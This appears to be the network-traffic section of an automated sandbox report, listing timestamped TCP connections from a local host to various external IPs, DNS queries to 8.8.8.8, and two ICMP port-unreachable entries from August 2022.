                                                                                                                                        Aug 8, 2022 20:12:31.443134069 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443172932 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443221092 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.443236113 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443284988 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.443327904 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.443386078 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443514109 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.443535089 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443608046 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.443928957 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443972111 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.444041014 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.444082975 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.444097996 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.444389105 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.444431067 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.444489002 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.444536924 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.444564104 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.444597006 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.444606066 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.444670916 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.444710016 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.444771051 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:33.298981905 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:33.299005032 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:41.740528107 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:41.740592003 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:41.740672112 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:41.792617083 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:41.792654037 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:41.880394936 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:41.880526066 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:41.898631096 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:41.898658037 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:41.899137020 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:41.899205923 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:41.901005983 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:41.943403006 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:42.418732882 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:42.418817997 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:42.418837070 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:42.418910027 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:42.418930054 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:42.418986082 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:42.427495003 CEST49749443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:42.427542925 CEST4434974913.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.163537979 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.163594007 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.163691998 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.213980913 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.214024067 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.303622961 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.303792000 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.308109999 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.308131933 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.312364101 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.312402010 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.902240992 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.902373075 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.902395964 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.902431965 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:43.902450085 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.902482986 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.903208017 CEST49751443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:43.903232098 CEST4434975113.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:13.667830944 CEST4982280192.168.2.3209.17.116.163
                                                                                                                                        Aug 8, 2022 20:14:13.788358927 CEST8049822209.17.116.163192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:13.788599014 CEST4982280192.168.2.3209.17.116.163
                                                                                                                                        Aug 8, 2022 20:14:13.788683891 CEST4982280192.168.2.3209.17.116.163
                                                                                                                                        Aug 8, 2022 20:14:13.910449028 CEST8049822209.17.116.163192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:13.910497904 CEST8049822209.17.116.163192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:13.910736084 CEST4982280192.168.2.3209.17.116.163
                                                                                                                                        Aug 8, 2022 20:14:13.911784887 CEST4982280192.168.2.3209.17.116.163
                                                                                                                                        Aug 8, 2022 20:14:14.032152891 CEST8049822209.17.116.163192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:18.962316036 CEST4982380192.168.2.381.169.145.158
                                                                                                                                        Aug 8, 2022 20:14:18.981985092 CEST804982381.169.145.158192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:18.982090950 CEST4982380192.168.2.381.169.145.158
                                                                                                                                        Aug 8, 2022 20:14:18.982198954 CEST4982380192.168.2.381.169.145.158
                                                                                                                                        Aug 8, 2022 20:14:19.001971006 CEST804982381.169.145.158192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:19.002310991 CEST804982381.169.145.158192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:19.002343893 CEST804982381.169.145.158192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:19.002511978 CEST4982380192.168.2.381.169.145.158
                                                                                                                                        Aug 8, 2022 20:14:19.002631903 CEST4982380192.168.2.381.169.145.158
                                                                                                                                        Aug 8, 2022 20:14:19.022180080 CEST804982381.169.145.158192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:24.037125111 CEST4983980192.168.2.334.102.136.180
                                                                                                                                        Aug 8, 2022 20:14:24.056571007 CEST804983934.102.136.180192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:24.056729078 CEST4983980192.168.2.334.102.136.180
                                                                                                                                        Aug 8, 2022 20:14:24.056804895 CEST4983980192.168.2.334.102.136.180
                                                                                                                                        Aug 8, 2022 20:14:24.075701952 CEST804983934.102.136.180192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:24.174422979 CEST804983934.102.136.180192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:24.174482107 CEST804983934.102.136.180192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:24.174726963 CEST4983980192.168.2.334.102.136.180
                                                                                                                                        Aug 8, 2022 20:14:24.174772024 CEST4983980192.168.2.334.102.136.180
                                                                                                                                        Aug 8, 2022 20:14:24.481487036 CEST4983980192.168.2.334.102.136.180
                                                                                                                                        Aug 8, 2022 20:14:24.498790026 CEST804983934.102.136.180192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:29.247128010 CEST4984980192.168.2.3198.54.117.218
                                                                                                                                        Aug 8, 2022 20:14:29.413604021 CEST8049849198.54.117.218192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:29.413872957 CEST4984980192.168.2.3198.54.117.218
                                                                                                                                        Aug 8, 2022 20:14:29.416650057 CEST4984980192.168.2.3198.54.117.218
                                                                                                                                        Aug 8, 2022 20:14:29.583184004 CEST8049849198.54.117.218192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:29.583239079 CEST8049849198.54.117.218192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:34.688512087 CEST4985080192.168.2.32.57.90.16
                                                                                                                                        Aug 8, 2022 20:14:34.725933075 CEST80498502.57.90.16192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:34.726094007 CEST4985080192.168.2.32.57.90.16
                                                                                                                                        Aug 8, 2022 20:14:34.726453066 CEST4985080192.168.2.32.57.90.16
                                                                                                                                        Aug 8, 2022 20:14:34.763787985 CEST80498502.57.90.16192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:34.763842106 CEST80498502.57.90.16192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:34.763865948 CEST80498502.57.90.16192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:34.764087915 CEST4985080192.168.2.32.57.90.16
                                                                                                                                        Aug 8, 2022 20:14:34.764131069 CEST4985080192.168.2.32.57.90.16
                                                                                                                                        Aug 8, 2022 20:14:34.801455975 CEST80498502.57.90.16192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:45.093102932 CEST4985180192.168.2.3154.55.180.56
                                                                                                                                        Aug 8, 2022 20:14:45.330430984 CEST8049851154.55.180.56192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:45.330543995 CEST4985180192.168.2.3154.55.180.56
                                                                                                                                        Aug 8, 2022 20:14:45.330689907 CEST4985180192.168.2.3154.55.180.56
                                                                                                                                        Aug 8, 2022 20:14:45.616466999 CEST8049851154.55.180.56192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:45.616508007 CEST8049851154.55.180.56192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:50.810069084 CEST4985380192.168.2.3156.226.60.131
                                                                                                                                        Aug 8, 2022 20:14:51.080883980 CEST8049853156.226.60.131192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:51.087308884 CEST4985380192.168.2.3156.226.60.131
                                                                                                                                        Aug 8, 2022 20:14:51.087372065 CEST4985380192.168.2.3156.226.60.131
                                                                                                                                        Aug 8, 2022 20:14:51.599245071 CEST4985380192.168.2.3156.226.60.131
                                                                                                                                        Aug 8, 2022 20:14:51.777698040 CEST4985380192.168.2.3156.226.60.131
                                                                                                                                        Aug 8, 2022 20:14:51.871649027 CEST8049853156.226.60.131192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:52.049791098 CEST8049853156.226.60.131192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:52.051713943 CEST4985380192.168.2.3156.226.60.131
                                                                                                                                        Aug 8, 2022 20:14:52.250135899 CEST8049853156.226.60.131192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:52.250375032 CEST4985380192.168.2.3156.226.60.131
                                                                                                                                        Aug 8, 2022 20:14:52.521508932 CEST8049853156.226.60.131192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:12.282888889 CEST4985580192.168.2.35.183.8.187
                                                                                                                                        Aug 8, 2022 20:15:12.410003901 CEST80498555.183.8.187192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:12.410274029 CEST4985580192.168.2.35.183.8.187
                                                                                                                                        Aug 8, 2022 20:15:12.410327911 CEST4985580192.168.2.35.183.8.187
                                                                                                                                        Aug 8, 2022 20:15:12.537420988 CEST80498555.183.8.187192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:12.639900923 CEST80498555.183.8.187192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:12.639959097 CEST80498555.183.8.187192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:12.640023947 CEST4985580192.168.2.35.183.8.187
                                                                                                                                        Aug 8, 2022 20:15:14.418132067 CEST4985580192.168.2.35.183.8.187
                                                                                                                                        Aug 8, 2022 20:15:14.544846058 CEST80498555.183.8.187192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.533107042 CEST4985680192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.550103903 CEST8049856188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.552835941 CEST4985680192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.555059910 CEST4985680192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.555296898 CEST4985680192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.555800915 CEST4985780192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.571950912 CEST8049856188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.572508097 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.572596073 CEST4985780192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.572709084 CEST8049856188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.572782993 CEST4985680192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.577404976 CEST4985780192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.577951908 CEST4985880192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.594727993 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594753981 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594774008 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594794035 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594810963 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594824076 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594842911 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594863892 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594877005 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594913006 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.594914913 CEST4985780192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.594934940 CEST8049858188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.595010042 CEST4985780192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.595067024 CEST4985780192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.595155954 CEST4985880192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.595506907 CEST4985880192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.611987114 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612015009 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612032890 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612051010 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612070084 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612087965 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612107038 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612127066 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612147093 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612164021 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612176895 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612195015 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612215042 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612234116 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612252951 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612272024 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612291098 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612391949 CEST8049858188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612741947 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.612835884 CEST4985780192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.612884045 CEST8049857188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.628506899 CEST8049858188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.628551960 CEST8049858188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.628739119 CEST4985880192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.628778934 CEST4985880192.168.2.3188.114.97.3
                                                                                                                                        Aug 8, 2022 20:15:34.645787954 CEST8049858188.114.97.3192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:39.960495949 CEST4985980192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.151216030 CEST804985938.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.151354074 CEST4985980192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.151515961 CEST4985980192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.151540041 CEST4985980192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.152000904 CEST4986080192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.341851950 CEST804985938.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.342138052 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.342304945 CEST4986080192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.342329979 CEST804985938.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.342433929 CEST4985980192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.343843937 CEST4986080192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.344352961 CEST4986180192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.534684896 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.534737110 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.534830093 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.535001993 CEST4986080192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.535063982 CEST4986080192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.535330057 CEST804986138.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.535482883 CEST4986180192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.535789013 CEST4986180192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.728971958 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.729027987 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.729055882 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.729084015 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.729109049 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.729137897 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.729209900 CEST4986080192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.744405031 CEST804986138.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.744460106 CEST804986138.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.744493961 CEST804986138.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.744602919 CEST4986180192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.744651079 CEST4986180192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.744657993 CEST4986180192.168.2.338.54.163.57
                                                                                                                                        Aug 8, 2022 20:15:40.920217991 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.920245886 CEST804986038.54.163.57192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:40.936044931 CEST804986138.54.163.57192.168.2.3

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Aug 8, 2022 20:12:06.922441006 CEST4931653192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:12:08.069134951 CEST5641753192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:12:28.656106949 CEST5592353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:12:29.444283962 CEST5772353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:12:41.664526939 CEST5811653192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:12:42.633210897 CEST5742153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:13.530627966 CEST4972353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:13.662398100 CEST53497238.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:18.930552006 CEST5258153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:18.961222887 CEST53525818.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:24.016206980 CEST5015253192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:24.035969973 CEST53501528.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:29.220875025 CEST5242753192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:29.246108055 CEST53524278.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:34.659301996 CEST6272453192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:34.687539101 CEST53627248.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:39.783365965 CEST6494153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:39.852020979 CEST53649418.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:44.908478022 CEST5540353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:45.086206913 CEST53554038.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:14:50.639390945 CEST6187753192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:14:50.809159994 CEST53618778.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:01.676448107 CEST6441253192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:01.709094048 CEST53644128.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:06.960392952 CEST5177953192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:07.235305071 CEST53517798.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:12.251024008 CEST5060853192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:12.281902075 CEST53506088.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:34.505660057 CEST5420553192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:34.530457973 CEST53542058.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:39.645056009 CEST6275653192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:39.959163904 CEST53627568.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:54.742095947 CEST5849753192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:54.761399984 CEST53584978.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:54.765111923 CEST6270153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:54.796822071 CEST53627018.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:54.800062895 CEST5352453192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:15:54.858072996 CEST53535248.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:15:59.877633095 CEST5856153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:00.858776093 CEST5856153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:01.909074068 CEST5856153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:03.956007004 CEST5856153192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:04.895198107 CEST53585618.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:05.042470932 CEST6155553192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:05.876121044 CEST53585618.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:06.061783075 CEST6155553192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:06.926480055 CEST53585618.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:07.413911104 CEST6155553192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:08.973356962 CEST53585618.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:09.431735039 CEST6155553192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:10.061058998 CEST53615558.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:10.081501007 CEST6443353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:11.081312895 CEST53615558.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:11.094490051 CEST6443353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:12.109828949 CEST6443353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:12.433202028 CEST53615558.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:14.125829935 CEST6443353192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:14.451484919 CEST53615558.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:15.101099968 CEST53644338.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:16.113787889 CEST53644338.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:17.129256964 CEST53644338.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:19.145693064 CEST53644338.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:21.767999887 CEST5409653192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:21.797375917 CEST53540968.8.8.8192.168.2.3
                                                                                                                                        Aug 8, 2022 20:16:26.877679110 CEST5782953192.168.2.38.8.8.8
                                                                                                                                        Aug 8, 2022 20:16:26.919265985 CEST53578298.8.8.8192.168.2.3

                                                                                                                                        ICMP Packets

                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                        Aug 8, 2022 20:16:05.876243114 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                                                        Aug 8, 2022 20:16:06.926682949 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
